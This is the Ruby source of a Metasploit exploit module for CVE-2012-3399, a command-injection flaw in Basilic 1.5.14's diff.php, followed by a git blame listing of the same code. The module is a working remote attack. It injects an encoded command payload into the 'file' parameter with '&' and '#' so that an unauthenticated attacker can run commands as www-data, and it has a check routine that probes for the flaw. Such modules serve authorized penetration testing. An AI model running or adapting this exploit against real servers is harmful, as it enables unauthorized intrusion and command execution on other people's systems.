modules/exploits/unix/webapp/basilic_diff_exec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Basilic 1.5.14 diff.php Arbitrary Command Execution',
      'Description'    => %q{
          This module abuses a metacharacter injection vulnerability in the
        diff.php script. This flaw allows an unauthenticated attacker to execute arbitrary
        commands as the www-data user account.
      },
      'Author'         =>
        [
          'lcashdollar',
          'sinn3r',
          'juan vazquez'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2012-3399' ],
          [ 'OSVDB', '83719' ],
          [ 'BID', '54234' ]
        ],
      'Platform'       => %w{ linux unix },
      'Arch'           => ARCH_CMD,
      'Privileged'     => true,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl ruby python telnet'
            }
        },
      'Targets'        =>
        [
          [ 'Automatic Target', { }]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2012-06-28'
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to Basilic', '/basilic-1.5.14/'])
      ])
  end


  def check
    base = normalize_uri(target_uri.path)

    sig = rand_text_alpha(10)

    res = send_request_cgi({
      'uri'  => normalize_uri("/#{base}/Config/diff.php"),
      'vars_get' => {
        'file' => sig,
        'new'  => '1',
        'old'  => '2'
      }
    })

    if res and res.code == 200 and res.body =~ /#{sig}/
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end


  def exploit
    print_status("Sending GET request...")

    base = normalize_uri(target_uri.path)

    res = send_request_cgi({
        'uri' => normalize_uri("/#{base}/Config/diff.php"),
        'vars_get' => {
          'file' => "&#{payload.encoded} #",
          'new'  => '1',
          'old'  => '2'
        }
      })

    if res and res.code == 404 then
      print_error("404 Basilic not installed or possibly check URI Path.")
    else
      vprint_line("Server returned #{res.code}")
    end

    handler
  end
end
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`Rank = ExcellentRanking`
Retab modules 2013-08-30 16:28:54 -05:00
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`include Msf::Exploit::Remote::HttpClient`
Retab modules 2013-08-30 16:28:54 -05:00
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Basilic 1.5.14 diff.php Arbitrary Command Execution',`
			`'Description' => %q{`
			`This module abuses a metacharacter injection vulnerability in the`
			`diff.php script. This flaw allows an unauthenticated attacker to execute arbitrary`
			`commands as the www-data user account.`
			`},`
We worked on it, so we got credit 2012-07-06 02:12:10 -05:00			`'Author' =>`
			`[`
			`'lcashdollar',`
			`'sinn3r',`
juan author name updated 2012-08-06 18:59:16 +02:00			`'juan vazquez'`
We worked on it, so we got credit 2012-07-06 02:12:10 -05:00			`],`
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
Update CVE references for exploit modules 2018-07-08 18:46:04 -05:00			`[ 'CVE', '2012-3399' ],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '83719' ],`
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`[ 'BID', '54234' ]`
			`],`
Prefer Ruby style for single word collections 2013-09-24 12:33:31 -05:00			`'Platform' => %w{ linux unix },`
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`'Arch' => ARCH_CMD,`
			`'Privileged' => true,`
			`'Payload' =>`
			`{`
			`'DisableNops' => true,`
			`'Compat' =>`
			`{`
			`'PayloadType' => 'cmd',`
Fix #5659 : Update CMD exploits payload compatibility options 2015-08-10 17:12:59 -05:00			`'RequiredCmd' => 'generic perl ruby python telnet'`
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`}`
			`},`
			`'Targets' =>`
			`[`
			`[ 'Automatic Target', { }]`
			`],`
			`'DefaultTarget' => 0,`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2012-06-28'`
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`))`
Retab modules 2013-08-30 16:28:54 -05:00
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`register_options(`
			`[`
			`OptString.new('TARGETURI', [true, 'The base path to Basilic', '/basilic-1.5.14/'])`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00

Add a check function to detect the vuln 2012-07-06 01:58:01 -05:00			`def check`
Add normalize_uri to modules that may have 2012-11-08 17:42:48 +01:00			`base = normalize_uri(target_uri.path)`
Retab modules 2013-08-30 16:28:54 -05:00
Add a check function to detect the vuln 2012-07-06 01:58:01 -05:00			`sig = rand_text_alpha(10)`
Retab modules 2013-08-30 16:28:54 -05:00
Add a check function to detect the vuln 2012-07-06 01:58:01 -05:00			`res = send_request_cgi({`
Correctly use normalize_uri() 2013-01-30 23:23:41 -06:00			`'uri' => normalize_uri("/#{base}/Config/diff.php"),`
Add a check function to detect the vuln 2012-07-06 01:58:01 -05:00			`'vars_get' => {`
			`'file' => sig,`
			`'new' => '1',`
			`'old' => '2'`
			`}`
			`})`
Retab modules 2013-08-30 16:28:54 -05:00
Check 200 2013-08-16 11:34:32 -05:00			`if res and res.code == 200 and res.body =~ /#{sig}/`
			`return Exploit::CheckCode::Vulnerable`
Add a check function to detect the vuln 2012-07-06 01:58:01 -05:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Check 200 2013-08-16 11:34:32 -05:00			`return Exploit::CheckCode::Safe`
Add a check function to detect the vuln 2012-07-06 01:58:01 -05:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00

Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`def exploit`
			`print_status("Sending GET request...")`
Retab modules 2013-08-30 16:28:54 -05:00
Add normalize_uri to modules that may have 2012-11-08 17:42:48 +01:00			`base = normalize_uri(target_uri.path)`
Retab modules 2013-08-30 16:28:54 -05:00
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`res = send_request_cgi({`
Correctly use normalize_uri() 2013-01-30 23:23:41 -06:00			`'uri' => normalize_uri("/#{base}/Config/diff.php"),`
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`'vars_get' => {`
Add a "#" in the end after the payload 2012-07-06 02:09:31 -05:00			`'file' => "&#{payload.encoded} #",`
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`'new' => '1',`
			`'old' => '2'`
			`}`
			`})`
Retab modules 2013-08-30 16:28:54 -05:00
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`if res and res.code == 404 then`
			`print_error("404 Basilic not installed or possibly check URI Path.")`
			`else`
Be less verbose 2012-07-15 22:19:12 -05:00			`vprint_line("Server returned #{res.code}")`
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add lcashdol's module from #568 2012-07-06 01:41:34 -05:00			`handler`
			`end`
			`end`